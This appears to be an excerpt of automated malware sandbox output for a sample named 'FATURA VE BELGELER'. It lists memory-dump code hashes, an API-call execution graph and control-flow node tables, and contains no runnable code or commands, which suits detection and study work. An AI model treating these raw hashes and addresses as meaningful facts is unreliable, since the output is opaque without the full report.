                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: a7c8e9d808cf2e0ea4c523e0bc2dae74a86dc9cfa7f8c3eed70dfcff1e21d39b
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 3E11267A504284CFCB02CF10D5C4B16BF71FB88318F24C6A9D8494B256C336D45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 63c309e75b8af5c33f41c61857115a733919d42faee320f3b3d4d87a44e7de33
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: FC118B79504280DFDB16CF14D5C4B15BBA2FB84214F24C6ADDC498B696C33AE44ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: :;
                                                              • API String ID: 0-904211322
                                                              • Opcode ID: ef5aafa9bee6e57823f58cfc2dd42aa9d2c36fe0ef14eb5ef77fc8a72f367eda
                                                              • Instruction ID: a34b81b58122e71dfc59f317c3edbd9aea6a359645a6d166513189e79be1d82f
                                                              • Opcode Fuzzy Hash: ef5aafa9bee6e57823f58cfc2dd42aa9d2c36fe0ef14eb5ef77fc8a72f367eda
                                                              • Instruction Fuzzy Hash: 05E11A74E001198FCB14DFA9C5819AEFBB2FF88315F248169D415AB356DB31AD82CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a4d0d4a97f0262507d3aa6293c6c57c8eb0442de69522b71a905f84a8358a51
                                                              • Instruction ID: 6c75779723f7296268646fb44094d7f0a8e47ad37dde8c42669691f285142162
                                                              • Opcode Fuzzy Hash: 1a4d0d4a97f0262507d3aa6293c6c57c8eb0442de69522b71a905f84a8358a51
                                                              • Instruction Fuzzy Hash: 3C1296B8C817458AEB10CF25F84C1893BB1B755318BF04A29D2617B6E5DBBC35AACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9eb0303c69eb7a591ba6e5ebe147e056d8f3486a828c0e37e758ae7e46fc80d
                                                              • Instruction ID: eff710b0665117598d89a810c4cb3d55def96ee13cc69189ae8791cff217a683
                                                              • Opcode Fuzzy Hash: e9eb0303c69eb7a591ba6e5ebe147e056d8f3486a828c0e37e758ae7e46fc80d
                                                              • Instruction Fuzzy Hash: 21E13CB4E001198FCB14DFA9C5809AEFBF2FF89315F248169D415A7356DB31A982CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9851786c1779929834be4d7e113810fa848ba30a4d5bc0230039d6e3022ecdfc
                                                              • Instruction ID: 904a10759238d213eee20a1ab6dff4b438b85b9913d6eff52b402700e166782b
                                                              • Opcode Fuzzy Hash: 9851786c1779929834be4d7e113810fa848ba30a4d5bc0230039d6e3022ecdfc
                                                              • Instruction Fuzzy Hash: DEE13B74E001198FCB14DFA9C5819AEFBB2FF89315F248169D405AB356DB31AD82CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c447f544883ae05cf267fa2d73b748207db54f5749f4f2a73f1b62d78405c9f5
                                                              • Instruction ID: 60bf4b14b22b57f1760e2bb105ff4416ebd62d37ee6866e0d713b8bdc61bfda2
                                                              • Opcode Fuzzy Hash: c447f544883ae05cf267fa2d73b748207db54f5749f4f2a73f1b62d78405c9f5
                                                              • Instruction Fuzzy Hash: 3BE12BB4E001198FCB14DFA9C5809AEFBB2FF89315F248169E415A7356D731AD81CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2958d2de3ec7476cf7fda4ef85ad7d565ebcd5a4523a619cc934c3773444d613
                                                              • Instruction ID: b2820394e218fe45c21c4603662d8ce95f93300c6990beae2b42f4755f224ce1
                                                              • Opcode Fuzzy Hash: 2958d2de3ec7476cf7fda4ef85ad7d565ebcd5a4523a619cc934c3773444d613
                                                              • Instruction Fuzzy Hash: 11E12C74E001198FCB14DFA9C5819AEFBB2FF89315F248159D405AB35ADB31AD82CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a920971d353ca411b9d9835895f2c74c464dc0adebd33b95f8b20e7a17e86609
                                                              • Instruction ID: 5314386019a1187968173abfa5a033c20adc1a74068db0225b50814740169d80
                                                              • Opcode Fuzzy Hash: a920971d353ca411b9d9835895f2c74c464dc0adebd33b95f8b20e7a17e86609
                                                              • Instruction Fuzzy Hash: DFD11835C2075A8ACB15EBA4D990A9DB771FF9A300F10879AD00977225FFB06AC9CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc14020af23920f7cebb41265b7690236b7b14b9198c71b0f6b622733c462fd0
                                                              • Instruction ID: 8709716ff764b377facb9136e07d42c9af2f5b1242d3fa217e933ae891e721be
                                                              • Opcode Fuzzy Hash: cc14020af23920f7cebb41265b7690236b7b14b9198c71b0f6b622733c462fd0
                                                              • Instruction Fuzzy Hash: 4AA16A3AA006098FDF05DFB8D8505AEB7B2BF85304B14856AE905EB265DF35E916CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f46176e6ce5ae57db8378387a661c1da875903d3af6c0221093e8e6ab901c9e0
                                                              • Instruction ID: e92d81cbb7a4628677e1ec9119011af5a1feff3d37004a378815c0c27e93d68f
                                                              • Opcode Fuzzy Hash: f46176e6ce5ae57db8378387a661c1da875903d3af6c0221093e8e6ab901c9e0
                                                              • Instruction Fuzzy Hash: ECD11935C2075A8ACB15EB64D950A9DF771FF96300F10879AD00977225FFB06AC5CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aadaf334f1a97771c33b422a18360c5aa59ea6ef394f558d6051b8c8bc1d797d
                                                              • Instruction ID: 88e7b41424440e1b5dd282067cd9b61f6f6f088119bfd5f5aad440d76852b3f3
                                                              • Opcode Fuzzy Hash: aadaf334f1a97771c33b422a18360c5aa59ea6ef394f558d6051b8c8bc1d797d
                                                              • Instruction Fuzzy Hash: DFC13CB8C817458FEB11CF24E8481897BB1BB85314FB04A29D2617B2E5DBBC356ACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8297a575ade1bd23e4a1e94ee3901582feed92347fa37c585d71e3753a0cacb6
                                                              • Instruction ID: e5a605dddd41ddba77d3cc9358bd47cdc78c01f661b8479b494cffa96b285773
                                                              • Opcode Fuzzy Hash: 8297a575ade1bd23e4a1e94ee3901582feed92347fa37c585d71e3753a0cacb6
                                                              • Instruction Fuzzy Hash: 27510A74E002198FDB14CFA9C5815AEFBF2FF89315F248169D418A7256DB319E42CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94259f3031b45c7af20f1ee9603142c2575c43b0e4facd64cfb0e7f6437e57c1
                                                              • Instruction ID: 3a5746baf7d6df1ef624d8d90a80c82c0591b329458e538d706de5e72a205b21
                                                              • Opcode Fuzzy Hash: 94259f3031b45c7af20f1ee9603142c2575c43b0e4facd64cfb0e7f6437e57c1
                                                              • Instruction Fuzzy Hash: E1C01216E8E004EDDA414E8A24100F4F7BE8A4B031F4530AEC56DA35128694801855A8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:13%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:145
                                                              Total number of Limit Nodes:15
                                                              execution_graph 31681 281d3d0 31682 281d3dc 31681->31682 31683 281d611 31682->31683 31686 66b3a60 31682->31686 31690 66b3a50 31682->31690 31687 66b3a6f 31686->31687 31694 66b312c 31687->31694 31691 66b3a6f 31690->31691 31692 66b312c 7 API calls 31691->31692 31693 66b3a90 31692->31693 31693->31683 31695 66b3137 31694->31695 31698 66b4904 31695->31698 31697 66b5416 31699 66b490f 31698->31699 31700 66b5b3c 31699->31700 31702 66b77c8 31699->31702 31700->31697 31703 66b77e9 31702->31703 31704 66b780d 31703->31704 31707 66b7978 31703->31707 31711 66b7958 31703->31711 31704->31700 31708 66b7985 31707->31708 31709 66b79be 31708->31709 31715 66b5f7c 31708->31715 31709->31704 31712 66b7978 31711->31712 31713 66b79be 31712->31713 31714 66b5f7c 7 API calls 31712->31714 31713->31704 31714->31713 31716 66b5f87 31715->31716 31718 66b7a30 31716->31718 31719 66b5fb0 31716->31719 31718->31718 31720 66b5fbb 31719->31720 31726 66b5fc0 31720->31726 31722 66b7a9f 31730 66bcea0 31722->31730 31739 66bce88 31722->31739 31723 66b7ad9 31723->31718 31727 66b5fcb 31726->31727 31728 66b8dc0 31727->31728 31729 66b77c8 7 API calls 31727->31729 31728->31722 31729->31728 31732 66bcfd1 31730->31732 31733 66bced1 31730->31733 31731 66bcedd 31731->31723 31732->31723 31733->31731 31748 66bd108 31733->31748 31752 66bd118 31733->31752 31734 66bcf1d 31756 66be812 31734->31756 31768 66be820 31734->31768 31740 66bced1 31739->31740 31743 66bcfd1 31739->31743 31741 66bcedd 31740->31741 31744 66bd108 4 API calls 31740->31744 31745 66bd118 4 API calls 31740->31745 31741->31723 31742 66bcf1d 31746 66be812 4 API calls 31742->31746 31747 66be820 4 API calls 31742->31747 31743->31723 31744->31742 31745->31742 31746->31743 31747->31743 31780 66bd168 31748->31780 31790 66bd158 31748->31790 31749 66bd122 31749->31734 31753 66bd122 31752->31753 31754 66bd168 3 API calls 31752->31754 31755 66bd158 3 API calls 31752->31755 31753->31734 31754->31753 31755->31753 31757 66be820 31756->31757 31800 66bed72 31757->31800 31805 66bed50 31757->31805 31811 66bed80 31757->31811 31761 66be8fa 31769 66be84b 31768->31769 31774 66bed72 GetModuleHandleW 31769->31774 31775 66bed50 GetModuleHandleW 31769->31775 31776 66bed80 GetModuleHandleW 31769->31776 31770 66be8ce 31771 66bc100 GetModuleHandleW 31770->31771 31773 66be8fa 31770->31773 31772 66be93e 31771->31772 31777 66bf652 2 API calls 31772->31777 31778 66bf632 2 API calls 31772->31778 31779 66bf700 CreateWindowExW 31772->31779 31774->31770 31775->31770 31776->31770 31777->31773 31778->31773 31779->31773 31781 66bd179 31780->31781 31784 66bd19c 31780->31784 31782 66bc100 GetModuleHandleW 31781->31782 31783 66bd184 31782->31783 31783->31784 31788 66bd3f1 GetModuleHandleW LoadLibraryExW 31783->31788 31789 66bd400 GetModuleHandleW LoadLibraryExW 31783->31789 31784->31749 31785 66bd194 31785->31784 31786 66bd3a0 GetModuleHandleW 31785->31786 31787 66bd3cd 31786->31787 31787->31749 31788->31785 31789->31785 31791 66bd179 31790->31791 31794 66bd19c 31790->31794 31792 66bc100 GetModuleHandleW 31791->31792 31793 66bd184 31792->31793 31793->31794 31798 66bd3f1 GetModuleHandleW LoadLibraryExW 31793->31798 31799 66bd400 GetModuleHandleW LoadLibraryExW 31793->31799 31794->31749 31795 66bd194 31795->31794 31796 66bd3a0 GetModuleHandleW 31795->31796 31797 66bd3cd 31796->31797 31797->31749 31798->31795 31799->31795 31801 66bed80 31800->31801 31802 66bee2e 31801->31802 31803 66beee2 GetModuleHandleW 31801->31803 31804 66beef0 GetModuleHandleW 31801->31804 31803->31802 31804->31802 31806 66be8ce 31805->31806 31807 66bedc2 31805->31807 31806->31761 31816 66bc100 31806->31816 31808 66bee2e 31807->31808 31809 66beee2 GetModuleHandleW 31807->31809 31810 66beef0 GetModuleHandleW 31807->31810 31809->31808 31810->31808 31812 66bed86 31811->31812 31813 66bee2e 31812->31813 31814 66beee2 GetModuleHandleW 31812->31814 31815 66beef0 GetModuleHandleW 31812->31815 31814->31813 31815->31813 31817 66bd358 GetModuleHandleW 31816->31817 31819 66bd3cd 31817->31819 31820 66bf632 31819->31820 31829 66bf700 31819->31829 31832 66bf652 31819->31832 31822 66bf63b 31820->31822 31821 66bf63f 31821->31761 31822->31821 31823 66bf6fb 31822->31823 31824 66bf74a CreateWindowExW 31822->31824 31826 66bd84c CreateWindowExW 31823->31826 31828 66bf874 31824->31828 31827 66bf735 31826->31827 31827->31761 31830 66bf735 31829->31830 31831 66bd84c CreateWindowExW 31829->31831 31830->31761 31831->31830 31833 66bf65f 31832->31833 31834 66bf6cc 31832->31834 31833->31761 31835 66bf6fb 31834->31835 31836 66bf74a CreateWindowExW 31834->31836 31838 66bd84c CreateWindowExW 31835->31838 31840 66bf874 31836->31840 31839 66bf735 31838->31839 31839->31761 31660 66b4b68 31661 66b4bae GetCurrentProcess 31660->31661 31663 66b4bf9 31661->31663 31664 66b4c00 GetCurrentThread 31661->31664 31663->31664 31665 66b4c3d GetCurrentProcess 31664->31665 31666 66b4c36 31664->31666 31667 66b4c73 31665->31667 31666->31665 31672 66b4d48 31667->31672 31675 66b4d38 31667->31675 31668 66b4c9b GetCurrentThreadId 31669 66b4ccc 31668->31669 31678 66b4834 31672->31678 31676 66b4d76 31675->31676 31677 66b4834 DuplicateHandle 31675->31677 31676->31668 31677->31676 31679 66b4db0 DuplicateHandle 31678->31679 31680 66b4d76 31679->31680 31680->31668

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 719 2816790-28167c6 720 28167ce-28167d4 719->720 848 28167c8 call 2816790 719->848 849 28167c8 call 28168e0 719->849 850 28167c8 call 2816168 719->850 721 2816824-2816828 720->721 722 28167d6-28167da 720->722 723 281682a-2816839 721->723 724 281683f-2816853 721->724 725 28167e9-28167f0 722->725 726 28167dc-28167e1 722->726 727 2816865-281686f 723->727 728 281683b-281683d 723->728 729 281685b-2816862 724->729 851 2816855 call 2819590 724->851 852 2816855 call 28198a8 724->852 853 2816855 call 2819848 724->853 730 28168c6-2816903 725->730 731 28167f6-28167fd 725->731 726->725 732 2816871-2816877 727->732 733 2816879-281687d 727->733 728->729 740 2816905-281690b 730->740 741 281690e-281692e 730->741 731->721 734 28167ff-2816803 731->734 735 2816885-28168bf 732->735 733->735 737 281687f 733->737 738 2816812-2816819 734->738 739 2816805-281680a 734->739 735->730 737->735 738->730 742 281681f-2816822 738->742 739->738 740->741 747 2816930 741->747 748 2816935-281693c 741->748 742->729 750 2816cc4-2816ccd 747->750 751 281693e-2816949 748->751 752 2816cd5-2816d11 751->752 753 281694f-2816962 751->753 762 2816d13-2816d18 752->762 763 2816d1a-2816d1e 752->763 758 2816964-2816972 753->758 759 2816978-2816993 753->759 758->759 765 2816c4c-2816c53 758->765 767 2816995-281699b 759->767 768 28169b7-28169ba 759->768 766 2816d24-2816d25 762->766 763->766 765->750 773 2816c55-2816c57 765->773 771 28169a4-28169a7 767->771 772 281699d 767->772 769 28169c0-28169c3 768->769 770 2816b14-2816b1a 768->770 769->770 780 28169c9-28169cf 769->780 778 2816b20-2816b25 770->778 779 2816c06-2816c09 770->779 774 28169a9-28169ac 771->774 775 28169da-28169e0 771->775 772->770 772->771 772->775 772->779 776 2816c66-2816c6c 773->776 777 2816c59-2816c5e 773->777 781 28169b2 774->781 782 2816a46-2816a4c 774->782 785 28169e2-28169e4 775->785 786 28169e6-28169e8 775->786 776->752 783 2816c6e-2816c73 776->783 777->776 778->779 787 2816cd0 779->787 788 2816c0f-2816c15 779->788 780->770 784 28169d5 780->784 781->779 782->779 791 2816a52-2816a58 782->791 789 2816c75-2816c7a 783->789 790 2816cb8-2816cbb 783->790 784->779 792 28169f2-28169fb 785->792 786->792 787->752 793 2816c17-2816c1f 788->793 794 2816c3a-2816c3e 788->794 789->787 796 2816c7c 789->796 790->787 795 2816cbd-2816cc2 790->795 797 2816a5a-2816a5c 791->797 798 2816a5e-2816a60 791->798 800 28169fd-2816a08 792->800 801 2816a0e-2816a36 792->801 793->752 799 2816c25-2816c34 793->799 794->765 802 2816c40-2816c46 794->802 795->750 795->773 803 2816c83-2816c88 796->803 804 2816a6a-2816a81 797->804 798->804 799->759 799->794 800->779 800->801 822 2816b2a-2816b60 801->822 823 2816a3c-2816a41 801->823 802->751 802->765 806 2816caa-2816cac 803->806 807 2816c8a-2816c8c 803->807 816 2816a83-2816a9c 804->816 817 2816aac-2816ad3 804->817 806->787 813 2816cae-2816cb1 806->813 810 2816c9b-2816ca1 807->810 811 2816c8e-2816c93 807->811 810->752 815 2816ca3-2816ca8 810->815 811->810 813->790 815->806 818 2816c7e-2816c81 815->818 816->822 826 2816aa2-2816aa7 816->826 817->787 828 2816ad9-2816adc 817->828 818->787 818->803 829 2816b62-2816b66 822->829 830 2816b6d-2816b75 822->830 823->822 826->822 828->787 831 2816ae2-2816b0b 828->831 832 2816b85-2816b89 829->832 833 2816b68-2816b6b 829->833 830->787 834 2816b7b-2816b80 830->834 831->822 846 2816b0d-2816b12 831->846 835 2816ba8-2816bac 832->835 836 2816b8b-2816b91 832->836 833->830 833->832 834->779 838 2816bb6-2816bd5 call 2816eb8 835->838 839 2816bae-2816bb4 835->839 836->835 840 2816b93-2816b9b 836->840 841 2816bdb-2816bdf 838->841 839->838 839->841 840->787 842 2816ba1-2816ba6 840->842 841->779 844 2816be1-2816bfd 841->844 842->779 844->779 846->822 848->720 849->720 850->720 851->729 852->729 853->729
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-615190528
                                                              • Opcode ID: 7c3993da3bf142fb2a42b9954d4304555d8862297f1678d9c0c5a59017def8ca
                                                              • Instruction ID: fb2f15d2198720734f11377a8f0c294f09c316c9736b1b4c846781b9d866caad
                                                              • Opcode Fuzzy Hash: 7c3993da3bf142fb2a42b9954d4304555d8862297f1678d9c0c5a59017def8ca
                                                              • Instruction Fuzzy Hash: 38125078A00229DFDB14CF69C984AADBBFAFF48304F558469E449EB2A5E734D841CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 854 281b388-281b39b 855 281b3a1-281b3aa 854->855 856 281b4da-281b4e0 854->856 857 281b3b0-281b3b4 855->857 858 281b4e4 855->858 859 281b4e1 856->859 860 281b3b6 857->860 861 281b3ce-281b3d5 857->861 862 281b4e9-281b4f1 858->862 863 281b3b9-281b3c4 860->863 861->856 864 281b3db-281b3e8 861->864 862->859 868 281b4f3-281b510 862->868 863->858 865 281b3ca-281b3cc 863->865 864->856 869 281b3ee-281b401 864->869 865->861 865->863 870 281b512-281b52a 868->870 871 281b53c 868->871 872 281b403 869->872 873 281b406-281b40e 869->873 885 281b533-281b536 870->885 886 281b52c-281b531 870->886 876 281b53e-281b542 871->876 872->873 874 281b410-281b416 873->874 875 281b47b-281b47d 873->875 874->875 878 281b418-281b41e 874->878 875->856 877 281b47f-281b485 875->877 877->856 880 281b487-281b491 877->880 878->862 881 281b424-281b43c 878->881 880->862 882 281b493-281b4ab 880->882 893 281b469-281b46c 881->893 894 281b43e-281b444 881->894 896 281b4d0-281b4d3 882->896 897 281b4ad-281b4b3 882->897 888 281b543-281b548 885->888 889 281b538-281b53a 885->889 886->876 895 281b549-281b559 888->895 889->870 889->871 893->858 899 281b46e-281b471 893->899 894->862 898 281b44a-281b45e 894->898 895->895 900 281b55b-281b580 895->900 896->858 902 281b4d5-281b4d8 896->902 897->862 901 281b4b5-281b4c9 897->901 898->862 908 281b464 898->908 899->858 903 281b473-281b479 899->903 904 281b582 900->904 905 281b587-281b664 call 2813960 call 2813480 900->905 901->862 910 281b4cb 901->910 902->856 902->880 903->874 903->875 904->905 919 281b666 905->919 920 281b66b-281b68c call 2814e20 905->920 908->893 910->896 919->920 922 281b691-281b69c 920->922 923 281b6a3-281b6a7 922->923 924 281b69e 922->924 925 281b6a9-281b6aa 923->925 926 281b6ac-281b6b3 923->926 924->923 929 281b6cb-281b70f 925->929 927 281b6b5 926->927 928 281b6ba-281b6c8 926->928 927->928 928->929 933 281b775-281b78c 929->933 935 281b711-281b727 933->935 936 281b78e-281b7b3 933->936 940 281b751 935->940 941 281b729-281b735 935->941 943 281b7b5-281b7ca 936->943 944 281b7cb 936->944 942 281b757-281b774 940->942 945 281b737-281b73d 941->945 946 281b73f-281b745 941->946 942->933 943->944 948 281b7cc 944->948 947 281b74f 945->947 946->947 947->942 948->948
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 322574a15060ad6cfa9a34b756d719bd4bdcd51e070476283e435a930b0cb919
                                                              • Instruction ID: 5dcc35a14072372b3a072f6adb34f5f328cd9404d1da33c481132a43c178cc46
                                                              • Opcode Fuzzy Hash: 322574a15060ad6cfa9a34b756d719bd4bdcd51e070476283e435a930b0cb919
                                                              • Instruction Fuzzy Hash: 17E10A78A00258CFDB14CFA9D984A9DBBB5FF58314F15C4A9E809EB3A1D734A841CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 952 281bf10-281bf11 953 281bf01-281bf02 952->953 954 281bf13-281bf15 952->954 955 281bf05-281bf0e 954->955 956 281bf17-281bf40 954->956 955->952 958 281bf42 956->958 959 281bf47-281bf8f 956->959 958->959 961 281bf97-281bfa6 call 2813960 959->961 963 281bfab-281c024 call 2813480 961->963 969 281c026 963->969 970 281c02b-281c04c call 2814e20 963->970 969->970 972 281c051-281c05c 970->972 973 281c063-281c067 972->973 974 281c05e 972->974 975 281c069-281c06a 973->975 976 281c06c-281c073 973->976 974->973 977 281c08b-281c0cf 975->977 978 281c075 976->978 979 281c07a-281c088 976->979 983 281c135-281c14c 977->983 978->979 979->977 985 281c0d1-281c0e7 983->985 986 281c14e-281c173 983->986 990 281c111 985->990 991 281c0e9-281c0f5 985->991 993 281c175-281c18a 986->993 994 281c18b 986->994 992 281c117-281c134 990->992 995 281c0f7-281c0fd 991->995 996 281c0ff-281c105 991->996 992->983 993->994 997 281c10f 995->997 996->997 997->992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: b61c34808fd1f91bffc5234b934a3590f8de86e34a224105ab289b37d06bef68
                                                              • Instruction ID: ab909e2116a54b72a4042f7fab5b76b78e094bd8496da926da4402a1c442e80b
                                                              • Opcode Fuzzy Hash: b61c34808fd1f91bffc5234b934a3590f8de86e34a224105ab289b37d06bef68
                                                              • Instruction Fuzzy Hash: 3781C578E412188FDB14DFAAD884A9DBBF2BF88304F14C06AE409EB265DB349945CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
